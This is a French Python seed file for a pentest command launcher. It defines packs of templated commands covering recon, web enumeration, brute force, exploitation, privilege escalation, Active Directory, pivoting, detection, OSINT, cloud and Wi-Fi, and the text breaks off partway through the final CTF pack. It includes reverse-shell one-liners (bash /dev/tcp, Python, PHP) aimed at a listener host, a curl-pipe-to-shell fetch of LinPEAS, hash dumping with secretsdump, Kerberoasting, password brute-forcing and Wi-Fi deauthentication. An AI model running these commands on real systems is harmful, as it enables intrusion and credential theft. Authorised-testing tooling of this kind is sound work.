"""
MIDINS Forge — bibliothèque de packs par défaut.

Cette liste est écrite dans packs/ (un fichier par pack) au premier
démarrage si le dossier est vide, pour donner une bibliothèque de
départ complète (100+ commandes) plutôt qu'un simple pack de démo.

Toutes les commandes ci-dessous sont des usages standards, publics et
largement documentés d'outils courants (nmap, hydra, impacket, etc.) —
à utiliser uniquement sur des systèmes que vous êtes autorisé à tester
(CTF, labs, engagements sous contrat).
"""

AUTHOR = "MIDINS Forge"
VERSION = "1.0"

SEED_PACKS = [
    {
        "pack_id": "recon-scan",
        "pack_name": "Recon & Scan Réseau",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#38bdf8",
        "icon": "target",
        "pack_tags": ["Pentest", "Red Team", "Réseau"],
        "description": "Découverte d'hôtes, scan de ports et prise d'empreinte de services.",
        "scripts": [
            {
                "id": "nmap-fast-recon", "title": "Nmap Fast Recon", "category": "Recon",
                "description": "Scan rapide des ports principaux avec détection de version et scripts par défaut.",
                "template": "nmap -sC -sV -T4 {{TARGET_IP}} -p {{PORTS:1-1000}}",
                "tags": ["nmap", "recon"],
            },
            {
                "id": "nmap-full-tcp", "title": "Nmap Full TCP", "category": "Recon",
                "description": "Scan complet des 65535 ports TCP, sortie enregistrée dans un fichier.",
                "template": "nmap -p- -T4 -oN {{OUTPUT:scan_full.txt}} {{TARGET_IP}}",
                "tags": ["nmap", "recon"],
            },
            {
                "id": "nmap-udp-top", "title": "Nmap UDP (top ports)", "category": "Recon",
                "description": "Scan des ports UDP les plus courants (plus lent qu'un scan TCP).",
                "template": "nmap -sU --top-ports {{TOP:20}} {{TARGET_IP}}",
                "tags": ["nmap", "udp"],
            },
            {
                "id": "masscan-fast", "title": "Masscan rapide", "category": "Recon",
                "description": "Scan massif et très rapide d'une plage de ports.",
                "template": "masscan {{TARGET_IP}} -p{{PORTS:1-65535}} --rate {{RATE:1000}}",
                "tags": ["masscan", "recon"],
            },
            {
                "id": "rustscan-quick", "title": "RustScan + Nmap", "category": "Recon",
                "description": "Scan ultra rapide puis passage automatique des ports ouverts à Nmap.",
                "template": "rustscan -a {{TARGET_IP}} -- -sC -sV",
                "tags": ["rustscan", "recon"],
            },
            {
                "id": "netcat-banner", "title": "Netcat — Banner Grabbing", "category": "Recon",
                "description": "Récupère la bannière d'un service pour identifier sa version.",
                "template": "nc -nv {{TARGET_IP}} {{PORT:80}}",
                "tags": ["netcat", "banner"],
            },
            {
                "id": "ping-sweep", "title": "Ping Sweep de sous-réseau", "category": "Recon",
                "description": "Détecte les hôtes actifs sur un sous-réseau /24.",
                "template": 'for ip in {{SUBNET:192.168.1}}.{1..254}; do ping -c 1 -W 1 $ip | grep "bytes from"; done',
                "tags": ["bash", "sweep"],
            },
            {
                "id": "arp-scan-local", "title": "ARP Scan (réseau local)", "category": "Recon",
                "description": "Découvre les hôtes du réseau local via des requêtes ARP.",
                "template": "arp-scan --interface={{INTERFACE:eth0}} --localnet",
                "tags": ["arp-scan", "local"],
            },
        ],
    },
    {
        "pack_id": "web-enum",
        "pack_name": "Web — Énumération & Vulnérabilités",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#a78bfa",
        "icon": "spider",
        "pack_tags": ["Pentest", "Red Team"],
        "description": "Découverte de contenus web, fingerprinting CMS et tests d'injection courants.",
        "scripts": [
            {
                "id": "gobuster-dir", "title": "Gobuster — Répertoires", "category": "Web",
                "description": "Brute-force de répertoires/fichiers web courants.",
                "template": "gobuster dir -u {{TARGET_URL:http://target.local}} -w {{WORDLIST:/usr/share/wordlists/dirb/common.txt}} -x {{EXTENSIONS:php,html,txt}}",
                "tags": ["gobuster", "web"],
            },
            {
                "id": "ffuf-dir", "title": "FFUF — Fuzzing de répertoires", "category": "Web",
                "description": "Fuzzing rapide de chemins avec filtrage sur les codes HTTP.",
                "template": "ffuf -u {{TARGET_URL:http://target.local}}/FUZZ -w {{WORDLIST:/usr/share/wordlists/dirb/common.txt}} -mc 200,301,302",
                "tags": ["ffuf", "web"],
            },
            {
                "id": "nikto-scan", "title": "Nikto — Scan de vulnérabilités", "category": "Web",
                "description": "Scan automatisé de vulnérabilités et mauvaises configurations web connues.",
                "template": "nikto -h {{TARGET_URL:http://target.local}}",
                "tags": ["nikto", "web"],
            },
            {
                "id": "whatweb-fingerprint", "title": "WhatWeb — Fingerprinting", "category": "Web",
                "description": "Identifie les technologies utilisées par un site (CMS, frameworks, serveur).",
                "template": "whatweb {{TARGET_URL:http://target.local}}",
                "tags": ["whatweb", "fingerprint"],
            },
            {
                "id": "wpscan-enum", "title": "WPScan — Audit WordPress", "category": "Web",
                "description": "Énumère utilisateurs, plugins et thèmes vulnérables sur un site WordPress.",
                "template": "wpscan --url {{TARGET_URL:http://target.local}} --enumerate u,vp,vt",
                "tags": ["wpscan", "wordpress"],
            },
            {
                "id": "sqlmap-basic", "title": "SQLMap — Test d'injection SQL", "category": "Web",
                "description": "Teste un paramètre pour une injection SQL et liste les bases de données.",
                "template": 'sqlmap -u "{{TARGET_URL:http://target.local/page.php?id=1}}" --batch --dbs',
                "tags": ["sqlmap", "injection"],
            },
            {
                "id": "curl-headers", "title": "Curl — En-têtes HTTP", "category": "Web",
                "description": "Récupère uniquement les en-têtes de réponse HTTP.",
                "template": "curl -I {{TARGET_URL:http://target.local}}",
                "tags": ["curl", "headers"],
            },
            {
                "id": "subdomain-ffuf", "title": "FFUF — Sous-domaines", "category": "Web",
                "description": "Brute-force de sous-domaines par substitution DNS.",
                "template": "ffuf -u https://FUZZ.{{DOMAIN:target.local}} -w {{WORDLIST:/usr/share/wordlists/subdomains.txt}} -mc 200",
                "tags": ["ffuf", "subdomain"],
            },
        ],
    },
    {
        "pack_id": "bruteforce-creds",
        "pack_name": "Bruteforce & Identifiants",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#f472b6",
        "icon": "unlock",
        "pack_tags": ["Pentest", "Red Team"],
        "description": "Attaques par dictionnaire sur des services et cassage de hashs.",
        "scripts": [
            {
                "id": "hydra-ssh", "title": "Hydra — Bruteforce SSH", "category": "Bruteforce",
                "description": "Attaque par dictionnaire sur un service SSH.",
                "template": "hydra -l {{USERNAME:root}} -P {{WORDLIST:/usr/share/wordlists/rockyou.txt}} ssh://{{TARGET_IP}}",
                "tags": ["hydra", "ssh"],
            },
            {
                "id": "hydra-ftp", "title": "Hydra — Bruteforce FTP", "category": "Bruteforce",
                "description": "Attaque par dictionnaire sur un service FTP.",
                "template": "hydra -l {{USERNAME:anonymous}} -P {{WORDLIST:/usr/share/wordlists/rockyou.txt}} ftp://{{TARGET_IP}}",
                "tags": ["hydra", "ftp"],
            },
            {
                "id": "medusa-smb", "title": "Medusa — Bruteforce SMB", "category": "Bruteforce",
                "description": "Attaque par dictionnaire sur un partage SMB Windows.",
                "template": "medusa -h {{TARGET_IP}} -u {{USERNAME:administrator}} -P {{WORDLIST:/usr/share/wordlists/rockyou.txt}} -M smbnt",
                "tags": ["medusa", "smb"],
            },
            {
                "id": "john-crack", "title": "John the Ripper", "category": "Bruteforce",
                "description": "Casse un fichier de hashs avec une liste de mots.",
                "template": "john --wordlist={{WORDLIST:/usr/share/wordlists/rockyou.txt}} {{HASH_FILE:hashes.txt}}",
                "tags": ["john", "hash"],
            },
            {
                "id": "hashcat-crack", "title": "Hashcat", "category": "Bruteforce",
                "description": "Casse des hashs par GPU (mode 0 = MD5 par défaut, à adapter).",
                "template": "hashcat -m {{MODE:0}} -a 0 {{HASH_FILE:hashes.txt}} {{WORDLIST:/usr/share/wordlists/rockyou.txt}}",
                "tags": ["hashcat", "hash"],
            },
            {
                "id": "crackmapexec-smb-login", "title": "CrackMapExec — Test SMB", "category": "Bruteforce",
                "description": "Teste un couple identifiant/mot de passe sur un hôte SMB.",
                "template": "crackmapexec smb {{TARGET_IP}} -u {{USERNAME:admin}} -p {{PASSWORD:password}}",
                "tags": ["crackmapexec", "smb"],
            },
            {
                "id": "hash-identify", "title": "Hashid — Identifier un hash", "category": "Bruteforce",
                "description": "Détermine le(s) algorithme(s) probable(s) d'un hash donné.",
                "template": "hashid {{HASH:5f4dcc3b5aa765d61d8327deb882cf99}}",
                "tags": ["hashid", "hash"],
            },
        ],
    },
    {
        "pack_id": "exploitation-shells",
        "pack_name": "Exploitation & Shells",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#fb923c",
        "icon": "boom",
        "pack_tags": ["Red Team", "CTF"],
        "description": "Listeners, reverse shells et lancement rapide de payloads Metasploit.",
        "scripts": [
            {
                "id": "reverse-shell-nc", "title": "Listener Netcat", "category": "Exploitation",
                "description": "Ouvre un listener Netcat en attente d'une connexion entrante.",
                "template": "nc -lvnp {{PORT:4444}}",
                "tags": ["netcat", "listener"],
            },
            {
                "id": "nc-connect", "title": "Netcat — Connexion sortante", "category": "Exploitation",
                "description": "Se connecte à un listener distant (ex. exfiltration, chat de test).",
                "template": "nc {{TARGET_IP}} {{PORT:4444}}",
                "tags": ["netcat", "connect"],
            },
            {
                "id": "bash-reverse-shell", "title": "Reverse Shell — Bash", "category": "Exploitation",
                "description": "One-liner bash classique utilisant /dev/tcp.",
                "template": "bash -i >& /dev/tcp/{{LHOST}}/{{LPORT:4444}} 0>&1",
                "tags": ["bash", "reverse-shell"],
            },
            {
                "id": "python-reverse-shell", "title": "Reverse Shell — Python", "category": "Exploitation",
                "description": "One-liner Python3 avec pty pour un shell interactif.",
                "template": "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"{{LHOST}}\",{{LPORT:4444}}));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/bash\")'",
                "tags": ["python", "reverse-shell"],
            },
            {
                "id": "php-reverse-shell", "title": "Reverse Shell — PHP", "category": "Exploitation",
                "description": "One-liner PHP basé sur fsockopen, utile sur un webshell existant.",
                "template": "php -r '$sock=fsockopen(\"{{LHOST}}\",{{LPORT:4444}});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
                "tags": ["php", "reverse-shell"],
            },
            {
                "id": "socat-listener", "title": "Socat — Listener", "category": "Exploitation",
                "description": "Listener Socat, alternative robuste à Netcat (supporte plusieurs connexions).",
                "template": "socat TCP-LISTEN:{{PORT:4444}},reuseaddr,fork -",
                "tags": ["socat", "listener"],
            },
            {
                "id": "upgrade-tty", "title": "Upgrade TTY (pty)", "category": "Exploitation",
                "description": "Transforme un shell basique en pseudo-TTY interactif (autocomplétion, Ctrl+C…).",
                "template": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
                "tags": ["python", "tty"],
            },
            {
                "id": "python-http-exfil", "title": "Serveur HTTP — Transfert de payload", "category": "Exploitation",
                "description": "Sert le dossier courant en HTTP pour transférer un binaire/script vers une cible.",
                "template": "python3 -m http.server {{PORT:8000}}",
                "tags": ["python", "transfer"],
            },
            {
                "id": "msfconsole-quick", "title": "Metasploit — Handler rapide", "category": "Exploitation",
                "description": "Lance msfconsole avec un handler déjà configuré pour un payload donné.",
                "template": 'msfconsole -q -x "use {{MODULE:exploit/multi/handler}}; set PAYLOAD {{PAYLOAD:linux/x64/shell_reverse_tcp}}; set LHOST {{LHOST}}; set LPORT {{LPORT:4444}}; run"',
                "tags": ["metasploit", "handler"],
            },
        ],
    },
    {
        "pack_id": "post-exploit-privesc",
        "pack_name": "Post-Exploitation & Élévation",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#f87171",
        "icon": "ladder",
        "pack_tags": ["Red Team"],
        "description": "Énumération locale et pistes d'élévation de privilèges Linux/Windows.",
        "scripts": [
            {
                "id": "system-id-check", "title": "Identité & système", "category": "PrivEsc",
                "description": "Premiers réflexes après un accès : utilisateur, kernel, distribution.",
                "template": "id && uname -a && cat /etc/os-release",
                "tags": ["enum", "linux"],
            },
            {
                "id": "linpeas-run", "title": "LinPEAS", "category": "PrivEsc",
                "description": "Télécharge et exécute le script d'énumération LinPEAS (PEASS-ng).",
                "template": "curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh",
                "tags": ["linpeas", "linux"],
            },
            {
                "id": "winpeas-download", "title": "WinPEAS — Téléchargement", "category": "PrivEsc",
                "description": "Télécharge le binaire WinPEAS pour l'exécuter ensuite sur la cible Windows.",
                "template": "curl -L -o winpeas.exe https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe",
                "tags": ["winpeas", "windows"],
            },
            {
                "id": "find-suid", "title": "Binaires SUID", "category": "PrivEsc",
                "description": "Liste les binaires avec le bit SUID positionné (pistes GTFOBins).",
                "template": "find / -perm -4000 -type f 2>/dev/null",
                "tags": ["find", "suid"],
            },
            {
                "id": "sudo-list", "title": "Droits sudo", "category": "PrivEsc",
                "description": "Liste les commandes exécutables en sudo par l'utilisateur courant.",
                "template": "sudo -l",
                "tags": ["sudo"],
            },
            {
                "id": "find-writable-dirs", "title": "Dossiers inscriptibles", "category": "PrivEsc",
                "description": "Repère les répertoires système inscriptibles par l'utilisateur courant.",
                "template": "find / -writable -type d 2>/dev/null | grep -v proc",
                "tags": ["find", "writable"],
            },
            {
                "id": "cron-check", "title": "Tâches planifiées (cron)", "category": "PrivEsc",
                "description": "Vérifie les tâches cron système, souvent source d'élévation de privilèges.",
                "template": "cat /etc/crontab; ls -la /etc/cron.*",
                "tags": ["cron"],
            },
        ],
    },
    {
        "pack_id": "ad-windows",
        "pack_name": "Active Directory & Windows",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#818cf8",
        "icon": "castle",
        "pack_tags": ["Red Team", "Windows/AD"],
        "description": "Énumération et attaques courantes sur un environnement Active Directory.",
        "scripts": [
            {
                "id": "enum4linux-full", "title": "Enum4linux", "category": "AD",
                "description": "Énumération SMB/NetBIOS classique (utilisateurs, partages, politique de mots de passe).",
                "template": "enum4linux -a {{TARGET_IP}}",
                "tags": ["enum4linux", "smb"],
            },
            {
                "id": "smbclient-list-shares", "title": "SMBClient — Lister les partages", "category": "AD",
                "description": "Liste les partages SMB accessibles sur un hôte.",
                "template": "smbclient -L //{{TARGET_IP}}/ -U {{USERNAME:guest}}",
                "tags": ["smbclient", "smb"],
            },
            {
                "id": "crackmapexec-users", "title": "CrackMapExec — Utilisateurs", "category": "AD",
                "description": "Énumère les utilisateurs du domaine via un compte SMB valide.",
                "template": "crackmapexec smb {{TARGET_IP}} -u {{USERNAME}} -p {{PASSWORD}} --users",
                "tags": ["crackmapexec", "ad"],
            },
            {
                "id": "impacket-secretsdump", "title": "Impacket — secretsdump", "category": "AD",
                "description": "Extrait les hashs (SAM/NTDS) via un accès administrateur.",
                "template": "impacket-secretsdump {{DOMAIN:WORKGROUP}}/{{USERNAME}}:{{PASSWORD}}@{{TARGET_IP}}",
                "tags": ["impacket", "ad"],
            },
            {
                "id": "impacket-getuserspns", "title": "Impacket — GetUserSPNs (Kerberoast)", "category": "AD",
                "description": "Récupère les tickets de service Kerberos à cracker hors ligne.",
                "template": "impacket-GetUserSPNs {{DOMAIN}}/{{USERNAME}}:{{PASSWORD}} -dc-ip {{DC_IP}} -request",
                "tags": ["impacket", "kerberoast"],
            },
            {
                "id": "impacket-psexec", "title": "Impacket — psexec", "category": "AD",
                "description": "Ouvre un shell distant via SMB avec des identifiants administrateur valides.",
                "template": "impacket-psexec {{DOMAIN}}/{{USERNAME}}:{{PASSWORD}}@{{TARGET_IP}}",
                "tags": ["impacket", "shell"],
            },
            {
                "id": "impacket-wmiexec", "title": "Impacket — wmiexec", "category": "AD",
                "description": "Exécution de commandes à distance via WMI (moins bruyant que psexec).",
                "template": "impacket-wmiexec {{DOMAIN}}/{{USERNAME}}:{{PASSWORD}}@{{TARGET_IP}}",
                "tags": ["impacket", "wmi"],
            },
            {
                "id": "bloodhound-ingestor", "title": "BloodHound — Collecte", "category": "AD",
                "description": "Collecte les relations AD pour analyse des chemins d'attaque dans BloodHound.",
                "template": "bloodhound-python -u {{USERNAME}} -p {{PASSWORD}} -d {{DOMAIN}} -ns {{DC_IP}} -c All",
                "tags": ["bloodhound", "ad"],
            },
        ],
    },
    {
        "pack_id": "network-pivoting",
        "pack_name": "Réseau & Pivoting",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#34d399",
        "icon": "globe",
        "pack_tags": ["Red Team", "Réseau"],
        "description": "Tunnels SSH, relais et pivot vers des réseaux internes.",
        "scripts": [
            {
                "id": "ssh-tunnel-local", "title": "SSH — Tunnel local", "category": "Pivoting",
                "description": "Redirige un port local vers un service accessible depuis un hôte rebond.",
                "template": "ssh -L {{LOCAL_PORT:8080}}:{{TARGET_IP}}:{{TARGET_PORT:80}} {{USERNAME}}@{{JUMP_HOST}}",
                "tags": ["ssh", "tunnel"],
            },
            {
                "id": "ssh-dynamic-proxy", "title": "SSH — Proxy SOCKS dynamique", "category": "Pivoting",
                "description": "Crée un proxy SOCKS via SSH pour router du trafic vers un réseau interne.",
                "template": "ssh -D {{LOCAL_PORT:1080}} {{USERNAME}}@{{JUMP_HOST}}",
                "tags": ["ssh", "socks"],
            },
            {
                "id": "chisel-server", "title": "Chisel — Serveur", "category": "Pivoting",
                "description": "Démarre un serveur Chisel en mode reverse pour accepter un tunnel entrant.",
                "template": "chisel server -p {{PORT:8000}} --reverse",
                "tags": ["chisel", "tunnel"],
            },
            {
                "id": "chisel-client", "title": "Chisel — Client", "category": "Pivoting",
                "description": "Établit un tunnel SOCKS reverse vers le serveur Chisel.",
                "template": "chisel client {{SERVER_IP}}:{{PORT:8000}} R:socks",
                "tags": ["chisel", "tunnel"],
            },
            {
                "id": "proxychains-nmap", "title": "Proxychains + Nmap", "category": "Pivoting",
                "description": "Route un scan Nmap à travers un proxy SOCKS déjà configuré.",
                "template": "proxychains nmap -sT -Pn {{TARGET_IP}}",
                "tags": ["proxychains", "nmap"],
            },
            {
                "id": "tcpdump-capture", "title": "Tcpdump — Capture générale", "category": "Réseau",
                "description": "Capture le trafic d'une interface dans un fichier pcap.",
                "template": "tcpdump -i {{INTERFACE:eth0}} -w {{OUTPUT:capture.pcap}}",
                "tags": ["tcpdump", "capture"],
            },
            {
                "id": "ss-connections", "title": "Connexions actives (ss)", "category": "Réseau",
                "description": "Liste les sockets TCP/UDP en écoute et connectés.",
                "template": "ss -tulnp",
                "tags": ["ss", "network"],
            },
        ],
    },
    {
        "pack_id": "blueteam-detection",
        "pack_name": "Blue Team & Détection",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#22d3ee",
        "icon": "shield",
        "pack_tags": ["Blue Team", "Forensics"],
        "description": "Surveillance réseau, journaux d'authentification et détection d'intrusion basique.",
        "scripts": [
            {
                "id": "tcpdump-filter-host", "title": "Tcpdump — Filtre ciblé", "category": "Détection",
                "description": "Capture uniquement le trafic vers/depuis une IP et un port précis.",
                "template": "tcpdump -i {{INTERFACE:eth0}} host {{TARGET_IP}} and port {{PORT:443}}",
                "tags": ["tcpdump", "filter"],
            },
            {
                "id": "journalctl-ssh", "title": "Journalctl — Auth SSH", "category": "Détection",
                "description": "Affiche les dernières lignes de journal du service SSH.",
                "template": "journalctl -u ssh -n {{LINES:100}} --no-pager",
                "tags": ["journalctl", "ssh"],
            },
            {
                "id": "grep-failed-logins", "title": "Échecs d'authentification", "category": "Détection",
                "description": "Recherche les tentatives de connexion échouées dans un journal.",
                "template": 'grep "Failed password" {{LOGFILE:/var/log/auth.log}} | tail -n {{LINES:50}}',
                "tags": ["grep", "auth"],
            },
            {
                "id": "netstat-listen", "title": "Ports en écoute (netstat)", "category": "Détection",
                "description": "Liste tous les processus et ports en écoute sur la machine.",
                "template": "netstat -tulnp",
                "tags": ["netstat"],
            },
            {
                "id": "last-logins", "title": "Historique des connexions", "category": "Détection",
                "description": "Affiche les dernières connexions au système.",
                "template": "last -n {{LINES:20}}",
                "tags": ["last", "auth"],
            },
            {
                "id": "chkrootkit-scan", "title": "Chkrootkit", "category": "Détection",
                "description": "Recherche de signatures de rootkits connus sur le système.",
                "template": "chkrootkit",
                "tags": ["chkrootkit"],
            },
            {
                "id": "rkhunter-scan", "title": "RKHunter", "category": "Détection",
                "description": "Audit de sécurité système à la recherche de rootkits et anomalies.",
                "template": "rkhunter --check --sk",
                "tags": ["rkhunter"],
            },
            {
                "id": "auditd-recent", "title": "Auditd — Événements récents", "category": "Détection",
                "description": "Interroge les journaux d'audit système pour les événements récents.",
                "template": "ausearch -ts recent",
                "tags": ["auditd"],
            },
        ],
    },
    {
        "pack_id": "malware-analysis",
        "pack_name": "Analyse de Malware",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#facc15",
        "icon": "dna",
        "pack_tags": ["Blue Team", "Malware", "Forensics"],
        "description": "Analyse statique rapide de fichiers suspects.",
        "scripts": [
            {
                "id": "file-identify", "title": "Identifier un fichier", "category": "Malware",
                "description": "Détermine le type réel d'un fichier via ses en-têtes (magic bytes).",
                "template": "file {{FILE:sample.bin}}",
                "tags": ["file"],
            },
            {
                "id": "strings-extract", "title": "Extraction de chaînes", "category": "Malware",
                "description": "Extrait les chaînes de caractères lisibles d'un binaire.",
                "template": "strings -n {{MIN_LEN:8}} {{FILE:sample.bin}} | less",
                "tags": ["strings"],
            },
            {
                "id": "sha256-hash", "title": "Empreinte SHA256", "category": "Malware",
                "description": "Calcule le hash SHA256 d'un fichier (pour recherche sur des bases de réputation).",
                "template": "sha256sum {{FILE:sample.bin}}",
                "tags": ["hash"],
            },
            {
                "id": "exiftool-metadata", "title": "Exiftool — Métadonnées", "category": "Malware",
                "description": "Extrait les métadonnées d'un fichier (image, document, etc.).",
                "template": "exiftool {{FILE:sample.jpg}}",
                "tags": ["exiftool", "metadata"],
            },
            {
                "id": "binwalk-scan", "title": "Binwalk — Extraction", "category": "Malware",
                "description": "Analyse et extrait le contenu embarqué d'une image firmware/binaire.",
                "template": "binwalk -e {{FILE:firmware.bin}}",
                "tags": ["binwalk"],
            },
            {
                "id": "upx-unpack", "title": "UPX — Dépaquetage", "category": "Malware",
                "description": "Décompresse un exécutable packé avec UPX.",
                "template": "upx -d {{FILE:packed.exe}} -o {{OUTPUT:unpacked.exe}}",
                "tags": ["upx"],
            },
            {
                "id": "objdump-disasm", "title": "Objdump — Désassemblage", "category": "Malware",
                "description": "Désassemble un binaire pour une lecture assembleur rapide.",
                "template": "objdump -d {{FILE:sample.bin}} | less",
                "tags": ["objdump"],
            },
            {
                "id": "yara-scan", "title": "YARA — Scan de règles", "category": "Malware",
                "description": "Recherche des motifs connus (règles YARA) dans un dossier d'échantillons.",
                "template": "yara {{RULE_FILE:rules.yar}} {{TARGET_PATH:/samples}}",
                "tags": ["yara"],
            },
        ],
    },
    {
        "pack_id": "osint",
        "pack_name": "OSINT",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#c084fc",
        "icon": "spy",
        "pack_tags": ["OSINT"],
        "description": "Collecte de renseignements en sources ouvertes sur un domaine ou un pseudonyme.",
        "scripts": [
            {
                "id": "whois-lookup", "title": "Whois", "category": "OSINT",
                "description": "Informations d'enregistrement d'un nom de domaine.",
                "template": "whois {{DOMAIN:target.local}}",
                "tags": ["whois"],
            },
            {
                "id": "dig-records", "title": "Dig — Enregistrements DNS", "category": "OSINT",
                "description": "Interroge tous les enregistrements DNS d'un domaine.",
                "template": "dig {{DOMAIN:target.local}} ANY +noall +answer",
                "tags": ["dig", "dns"],
            },
            {
                "id": "theharvester-run", "title": "theHarvester", "category": "OSINT",
                "description": "Collecte emails, sous-domaines et hôtes depuis des sources publiques.",
                "template": "theHarvester -d {{DOMAIN:target.local}} -b all",
                "tags": ["theharvester"],
            },
            {
                "id": "sherlock-username", "title": "Sherlock — Pseudonyme", "category": "OSINT",
                "description": "Recherche un pseudonyme sur des centaines de réseaux sociaux.",
                "template": "sherlock {{USERNAME:johndoe}}",
                "tags": ["sherlock", "username"],
            },
            {
                "id": "subfinder-run", "title": "Subfinder", "category": "OSINT",
                "description": "Énumération passive de sous-domaines.",
                "template": "subfinder -d {{DOMAIN:target.local}} -silent",
                "tags": ["subfinder", "subdomain"],
            },
            {
                "id": "amass-enum", "title": "Amass — Énumération", "category": "OSINT",
                "description": "Cartographie de surface d'attaque (sous-domaines, ASN, etc.).",
                "template": "amass enum -d {{DOMAIN:target.local}}",
                "tags": ["amass"],
            },
            {
                "id": "shodan-search", "title": "Shodan — Recherche", "category": "OSINT",
                "description": "Recherche d'appareils/services exposés via l'API Shodan (clé requise).",
                "template": 'shodan search "{{QUERY:apache}}"',
                "tags": ["shodan"],
            },
            {
                "id": "curl-robots-txt", "title": "Robots.txt", "category": "OSINT",
                "description": "Récupère le fichier robots.txt, souvent révélateur de chemins sensibles.",
                "template": "curl {{TARGET_URL:http://target.local}}/robots.txt",
                "tags": ["curl"],
            },
        ],
    },
    {
        "pack_id": "cloud-containers",
        "pack_name": "Cloud & Conteneurs",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#2dd4bf",
        "icon": "cloud",
        "pack_tags": ["Cloud", "SysAdmin"],
        "description": "Inspection Docker/Kubernetes et vérifications basiques sur AWS.",
        "scripts": [
            {
                "id": "docker-ps-all", "title": "Docker — Conteneurs", "category": "Cloud",
                "description": "Liste tous les conteneurs, y compris arrêtés.",
                "template": "docker ps -a",
                "tags": ["docker"],
            },
            {
                "id": "docker-inspect", "title": "Docker — Inspection", "category": "Cloud",
                "description": "Détaille la configuration complète d'un conteneur.",
                "template": "docker inspect {{CONTAINER:my_container}}",
                "tags": ["docker"],
            },
            {
                "id": "docker-compose-up", "title": "Docker Compose — Démarrage", "category": "Cloud",
                "description": "Démarre la stack définie dans docker-compose.yml en arrière-plan.",
                "template": "docker compose up -d",
                "tags": ["docker-compose"],
            },
            {
                "id": "trivy-scan-image", "title": "Trivy — Scan d'image", "category": "Cloud",
                "description": "Recherche les vulnérabilités connues dans une image de conteneur.",
                "template": "trivy image {{IMAGE:nginx:latest}}",
                "tags": ["trivy"],
            },
            {
                "id": "kube-hunter-remote", "title": "Kube-hunter", "category": "Cloud",
                "description": "Recherche de faiblesses exposées sur un cluster Kubernetes.",
                "template": "kube-hunter --remote {{TARGET_IP}}",
                "tags": ["kube-hunter", "kubernetes"],
            },
            {
                "id": "aws-whoami", "title": "AWS — Identité courante", "category": "Cloud",
                "description": "Affiche l'identité IAM associée aux identifiants configurés.",
                "template": "aws sts get-caller-identity",
                "tags": ["aws"],
            },
            {
                "id": "aws-s3-list", "title": "AWS — Lister un bucket S3", "category": "Cloud",
                "description": "Liste le contenu d'un bucket S3 accessible.",
                "template": "aws s3 ls s3://{{BUCKET:my-bucket}}",
                "tags": ["aws", "s3"],
            },
        ],
    },
    {
        "pack_id": "wireless",
        "pack_name": "Wireless",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#fb7185",
        "icon": "satellite",
        "pack_tags": ["Pentest", "Wireless"],
        "description": "Audit de réseaux Wi-Fi avec la suite Aircrack-ng.",
        "scripts": [
            {
                "id": "airmon-start", "title": "Airmon-ng — Mode moniteur", "category": "Wireless",
                "description": "Passe une interface Wi-Fi en mode moniteur.",
                "template": "airmon-ng start {{INTERFACE:wlan0}}",
                "tags": ["aircrack-ng", "airmon"],
            },
            {
                "id": "airodump-scan", "title": "Airodump-ng — Scan général", "category": "Wireless",
                "description": "Liste les réseaux Wi-Fi et clients à proximité.",
                "template": "airodump-ng {{INTERFACE:wlan0mon}}",
                "tags": ["aircrack-ng", "airodump"],
            },
            {
                "id": "airodump-target", "title": "Airodump-ng — Cible précise", "category": "Wireless",
                "description": "Capture le trafic (dont le handshake) d'un point d'accès précis.",
                "template": "airodump-ng -c {{CHANNEL:6}} --bssid {{BSSID}} -w {{OUTPUT:capture}} {{INTERFACE:wlan0mon}}",
                "tags": ["aircrack-ng", "airodump"],
            },
            {
                "id": "aireplay-deauth", "title": "Aireplay-ng — Déauthentification", "category": "Wireless",
                "description": "Envoie des trames de déauthentification pour forcer une reconnexion (capture du handshake).",
                "template": "aireplay-ng --deauth {{COUNT:10}} -a {{BSSID}} {{INTERFACE:wlan0mon}}",
                "tags": ["aircrack-ng", "deauth"],
            },
            {
                "id": "aircrack-crack", "title": "Aircrack-ng — Cassage WPA", "category": "Wireless",
                "description": "Casse une clé WPA/WPA2 à partir d'un handshake capturé.",
                "template": "aircrack-ng {{CAPTURE_FILE:capture.cap}} -w {{WORDLIST:/usr/share/wordlists/rockyou.txt}}",
                "tags": ["aircrack-ng"],
            },
            {
                "id": "wifite-auto", "title": "Wifite — Mode automatique", "category": "Wireless",
                "description": "Automatise la découverte et l'attaque de réseaux Wi-Fi à proximité.",
                "template": "wifite --kill",
                "tags": ["wifite"],
            },
        ],
    },
    {
        "pack_id": "ctf-stego",
        "pack_name": "CTF & Stéganographie",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#f59e0b",
        "icon": "flag",
        "pack_tags": ["CTF"],
        "description": "Extraction de données cachées et préparation de fichiers pour cassage de mots de passe.",
        "scripts": [
            {
                "id": "steghide-extract", "title": "Steghide — Extraction", "category": "Stéganographie",
                "description": "Extrait des données cachées dans une image via Steghide.",
                "template": "steghide extract -sf {{FILE:image.jpg}}",
                "tags": ["steghide"],
            },
            {
                "id": "zsteg-scan", "title": "Zsteg — Analyse PNG/BMP", "category": "Stéganographie",
                "description": "Détecte des données cachées dans les bits de poids faible d'une image.",
                "template": "zsteg {{FILE:image.png}}",
                "tags": ["zsteg"],
            },
            {
                "id": "binwalk-ctf", "title": "Binwalk — Fichiers imbriqués", "category": "Stéganographie",
                "description": "Recherche et extrait des fichiers cachés à l'intérieur d'une image CTF.",
                "template": "binwalk -e {{FILE:challenge.png}}",
                "tags": ["binwalk"],
            },
            {
                "id": "exiftool-ctf", "title": "Exiftool — Indices cachés", "category": "Stéganographie",
                "description": "Vérifie les métadonnées d'un fichier CTF (commentaires, GPS, auteur…).",
                "template": "exiftool {{FILE:challenge.jpg}}",
